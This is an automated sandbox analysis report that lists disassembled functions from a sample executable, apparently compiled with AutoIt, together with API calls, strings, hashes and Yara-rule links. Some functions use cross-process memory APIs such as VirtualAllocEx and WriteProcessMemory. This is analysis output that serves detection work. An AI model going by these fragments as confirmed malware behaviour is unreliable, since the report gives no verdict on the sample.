Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#S$x#S$x#S
API String ID: 1072379062-2778366455
Opcode ID: 5414c2189cbe32cebca7c9bd92b3e74e56651545ae058679c0a6ac93d6004806
Instruction ID: 57c84b78493cf7c31e0ef525b7cdb127d0f1f226cb0a58fbeea5ea298f1d6352
Opcode Fuzzy Hash: 5414c2189cbe32cebca7c9bd92b3e74e56651545ae058679c0a6ac93d6004806
Instruction Fuzzy Hash: 5AC1BD30A00105AFCB14EF59C890EBEB7B9FF58344F11806EE9059B281DB78ED45CB99

Function 00498A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00498B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00498B7A
__dosmaperr.LIBCMT ref: 00498B81

Strings

.H, xrefs: 00498A63

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .H
API String ID: 2434981716-3517028204
Opcode ID: e732328fb2b85a65e1b8cb35634282b14dc79471ca8b559489718b56ba16b688
Instruction ID: ca365485f8c3be90df0aab2c5e4e137a064fffcb8771920ca307c05c1e00390e
Opcode Fuzzy Hash: e732328fb2b85a65e1b8cb35634282b14dc79471ca8b559489718b56ba16b688
Instruction Fuzzy Hash: 93413870604145AFDF249F2DC890A7E7FA5DB87304B2C41BFF88587242DE399C129798

Function 004C2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004C21D0,?,?,00000034,00000800,?,00000034), ref: 004CB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004C2760

Part of subcall function 004CB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004C21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004CB3F8

Part of subcall function 004CB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004CB355
Part of subcall function 004CB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004C2194,00000034,?,?,00001004,00000000,00000000), ref: 004CB365
Part of subcall function 004CB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004C2194,00000034,?,?,00001004,00000000,00000000), ref: 004CB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004C27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004C281A

Strings

@, xrefs: 004C2832

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ea874883d67dba8d720a9ca346f34ae2c00284b21e7e5e5551d85384b80397cd
Instruction ID: 4c34646e8ef90be19bc8e254b79a41a90d9addefd4c73311905b4e64631e163c
Opcode Fuzzy Hash: ea874883d67dba8d720a9ca346f34ae2c00284b21e7e5e5551d85384b80397cd
Instruction Fuzzy Hash: CA416D76900218AFDB10DBA4CD82FEEBBB8EF05304F10405AFA45B7191DBB46E45CBA5

Function 0049172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KcSzB2IpP5.exe,00000104), ref: 00491769
_free.LIBCMT ref: 00491834
_free.LIBCMT ref: 0049183E

Strings

C:\Users\user\Desktop\KcSzB2IpP5.exe, xrefs: 00491760, 00491767, 00491796, 004917CE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\KcSzB2IpP5.exe
API String ID: 2506810119-3631068685
Opcode ID: 47e84e0a8d7cdc43c30248ab105acad2be7034225d5b2e951b601ca9373bdef5
Instruction ID: cbf794faf02b3e11cc806704d19b5c164f2f8d5db5b628b4c2d5807079fd5e05
Opcode Fuzzy Hash: 47e84e0a8d7cdc43c30248ab105acad2be7034225d5b2e951b601ca9373bdef5
Instruction Fuzzy Hash: 7131B575A00209ABCF11EB968880D9FBFFCEB94310B1041BBF40497321D6744A44DBA8

Function 004CC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004CC306
DeleteMenu.USER32(?,00000007,00000000), ref: 004CC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00531990,00FA7628), ref: 004CC395

Strings

0, xrefs: 004CC2DF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: f7c48ce491998b75cce080dbf61788d3f876127eaaa6103b4d9608a0bd597873
Instruction ID: 2c17be04d6a579e635ae5d187990394cb4d8fa91982048d52532c5d2733a8e25
Opcode Fuzzy Hash: f7c48ce491998b75cce080dbf61788d3f876127eaaa6103b4d9608a0bd597873
Instruction Fuzzy Hash: B141B1352043419FD760DF25E884F2ABBE4AB85314F00861EFC69973A1D778A804CB5A

Function 004F4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004FCC08,00000000,?,?,?,?), ref: 004F44AA
GetWindowLongW.USER32 ref: 004F44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004F44D7

Strings

SysTreeView32, xrefs: 004F447C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: c571d6a043f75c15f37671f59489ab3db0bf839bcc70758a6822ae1790c4d882
Instruction ID: 81fd595bd3510e1bf93d870af85935a63cef78fea9d578f2a85407071ed72c8f
Opcode Fuzzy Hash: c571d6a043f75c15f37671f59489ab3db0bf839bcc70758a6822ae1790c4d882
Instruction Fuzzy Hash: B7319231114609AFDB109E38DC45BE777A9EB48334F204726FA75E22D0DB78EC519B54

Function 004C6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 004C6EED
VariantCopyInd.OLEAUT32(?,?), ref: 004C6F08
VariantClear.OLEAUT32(?), ref: 004C6F12

Strings

*jL, xrefs: 004C6E8B, 004C6E90, 004C6EF8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jL
API String ID: 2173805711-719557810
Opcode ID: 0890097bc9526962dfa75465ebcc046af59ed4ca27fd8734fabef68eee8acb32
Instruction ID: 5baad521815ba43ab91b4786c18b397d7326f0e49ae4e4fa6d47dcf41187b2ca
Opcode Fuzzy Hash: 0890097bc9526962dfa75465ebcc046af59ed4ca27fd8734fabef68eee8acb32
Instruction Fuzzy Hash: DD312535704205DFCB04AF54D890EBE3771EF4A308B0144AEF9068B2B1D7789912CBDA

Function 004E304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004E335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,004E3077,?,?), ref: 004E3378

inet_addr.WSOCK32(?), ref: 004E307A
_wcslen.LIBCMT ref: 004E309B
htons.WSOCK32(00000000), ref: 004E3106

Strings

255.255.255.255, xrefs: 004E3095, 004E309A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: e62e91ae3b9074304c28ed70164fa73fc4b092f3873de8d579d396b483c36c4d
Instruction ID: 167a80f7a6bb4c0c73300ad04fb4b7f8b55641f4c08bb0b0f1678af9dd0e0615
Opcode Fuzzy Hash: e62e91ae3b9074304c28ed70164fa73fc4b092f3873de8d579d396b483c36c4d
Instruction Fuzzy Hash: 7E312B35200285DFCB11DF2AC589E6AB7F0EF5431AF24809AE8158B392D779DF41C765

Function 004F4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004F4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004F4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004F471A

Strings

msctls_updown32, xrefs: 004F4684

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 0766f1e1b17737df66020c403eac44279b9a4a40e545f1fa51efe8d5083d80f3
Instruction ID: 32b89af6e414bc89300fe80a320262137734d3715837677b92bb3cc37bb27dc2
Opcode Fuzzy Hash: 0766f1e1b17737df66020c403eac44279b9a4a40e545f1fa51efe8d5083d80f3
Instruction Fuzzy Hash: 93214CB5604208AFEB10DF65DCC1DB737ADEB9A398B04005AFA009B391DB74EC11DA64

Function 004C95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004C961D

Strings

#requireadmin, xrefs: 004C95D9
#notrayicon, xrefs: 004C95B7
#OnAutoItStartRegister, xrefs: 004C95F3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 19d0c02ef1926260564a4a2379586d328a7ce6559c49346c580ba17030634fff
Instruction ID: 4db3f80c33c044fa582914a436113bfef44009f155f26013a4d7ede385ed391b
Opcode Fuzzy Hash: 19d0c02ef1926260564a4a2379586d328a7ce6559c49346c580ba17030634fff
Instruction Fuzzy Hash: CE21463620411076C371BB25980AFBB73D8AFA0318F54442FFA4997281EB6CAD46C39E

Function 004F37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004F3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004F3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004F3876

Strings

Listbox, xrefs: 004F380F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 0bb7c4273a7eb6f69b661141b92256e1cf736919d98eb77547005b4f5002f551
Instruction ID: de8e71c93691590c660db5f0e8cf7e2c58e6f4d54f460690050189ebdf144585
Opcode Fuzzy Hash: 0bb7c4273a7eb6f69b661141b92256e1cf736919d98eb77547005b4f5002f551
Instruction Fuzzy Hash: 4621B07260011CBBEB119F65CC81EBB37AEEF89794F118125FA009B290C679DC52C7A4

Function 004D49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004D4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004D4A5C
SetErrorMode.KERNEL32(00000000,?,?,004FCC08), ref: 004D4AD0

Strings

%lu, xrefs: 004D4A6F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 879a2feb9c5e40564bbd7e76627b2972efcf4096cfe69f9b9c0d2c41583c9b7b
Instruction ID: d7222578a20412d3ca192b7ce7192b6fdd55bf8ed25a3d19fbb4d7b444bb246b
Opcode Fuzzy Hash: 879a2feb9c5e40564bbd7e76627b2972efcf4096cfe69f9b9c0d2c41583c9b7b
Instruction Fuzzy Hash: C131A274A00108AFDB10DF54C985EAA7BF8EF48308F1480AAF809DB352D775ED45CB65

Function 004F41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004F424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004F4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004F4271

Strings

msctls_trackbar32, xrefs: 004F4226

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3158467315b3a60d19d6f8f6f8e3dbbb792188d685569a42b397ad2a3f077447
Instruction ID: 80a60f66e34af8aa1972700bfe919ff4e9cf80dd9c4f65eb7fccc18abd4b78f5
Opcode Fuzzy Hash: 3158467315b3a60d19d6f8f6f8e3dbbb792188d685569a42b397ad2a3f077447
Instruction Fuzzy Hash: EC11E73124024C7EEF205E35CC46FBB3BACEF95764F020529FA55E6190D675D811D728

Function 004C2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

Part of subcall function 004C2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004C2DC5
Part of subcall function 004C2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004C2DD6
Part of subcall function 004C2DA7: GetCurrentThreadId.KERNEL32 ref: 004C2DDD
Part of subcall function 004C2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004C2DE4

GetFocus.USER32 ref: 004C2F78

Part of subcall function 004C2DEE: GetParent.USER32(00000000), ref: 004C2DF9

GetClassNameW.USER32(?,?,00000100), ref: 004C2FC3
EnumChildWindows.USER32(?,004C303B), ref: 004C2FEB

Strings

%s%d, xrefs: 004C2FFF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: d3e6e83580fe2f22bcb851b187e53c52b7eacb1f4f3baf6e8a925cb2f3538ea1
Instruction ID: e2eccd293dfa76e75e2e76cb67bf22f4c9dd77a669d7686796c3c4f7ab768a4a
Opcode Fuzzy Hash: d3e6e83580fe2f22bcb851b187e53c52b7eacb1f4f3baf6e8a925cb2f3538ea1
Instruction Fuzzy Hash: B211D875200209A7DF807F618DC5FFD376AAF94308F04807EB909D7192DEB85909CB64

Function 004F5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004F58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004F58EE
DrawMenuBar.USER32(?), ref: 004F58FD

Strings

0, xrefs: 004F588F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 8204c50e7b2a089b4e7829cb7a8274b862601f3b2072b9bf8d421b794280f7b0
Instruction ID: f19cd1a339b02ff2786795b98cbb33fe79006a29ac5ca9694bf0a103425dd795
Opcode Fuzzy Hash: 8204c50e7b2a089b4e7829cb7a8274b862601f3b2072b9bf8d421b794280f7b0
Instruction Fuzzy Hash: 6E015B7150021CEEDB219F21DC44BBFBBB4FF45360F1080AAEA49D6251DB748A95EF29

Function 004BD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004BD3BF
FreeLibrary.KERNEL32 ref: 004BD3E5

Strings

X64, xrefs: 004BD2A8
GetSystemWow64DirectoryW, xrefs: 004BD3B9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 52e523133e3042322c0a1309f4473b0e1d55ca866902c1e36a6029c1ad03e23f
Instruction ID: cfe02f36fb18c746c27aa0a40422ec267aaf726b4baf23e5e350dfcaafadaf03
Opcode Fuzzy Hash: 52e523133e3042322c0a1309f4473b0e1d55ca866902c1e36a6029c1ad03e23f
Instruction Fuzzy Hash: 1DF05521C01A698BC33942104DA4AFA3360AF20701B59D5EBE802E5209F72CCCA58AFF

Function 004C007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e57dfe04c6bbd9a2334257dc35e3b49e83a7cf4162ae17cfc3d71949e47a40
Instruction ID: 8f5ffe8161cc81a8b18f8209b4963b94a208bcf2dec621d76054b93a60d5a719
Opcode Fuzzy Hash: 01e57dfe04c6bbd9a2334257dc35e3b49e83a7cf4162ae17cfc3d71949e47a40
Instruction Fuzzy Hash: 91C14879A0020AEFCB54CFA4C894FAAB7B5FF48304F148599E905EB261C735ED41CB94

Function 004E342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004E3459
CoUninitialize.OLE32 ref: 004E3463
VariantInit.OLEAUT32(?), ref: 004E346E
VariantClear.OLEAUT32(?), ref: 004E371B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
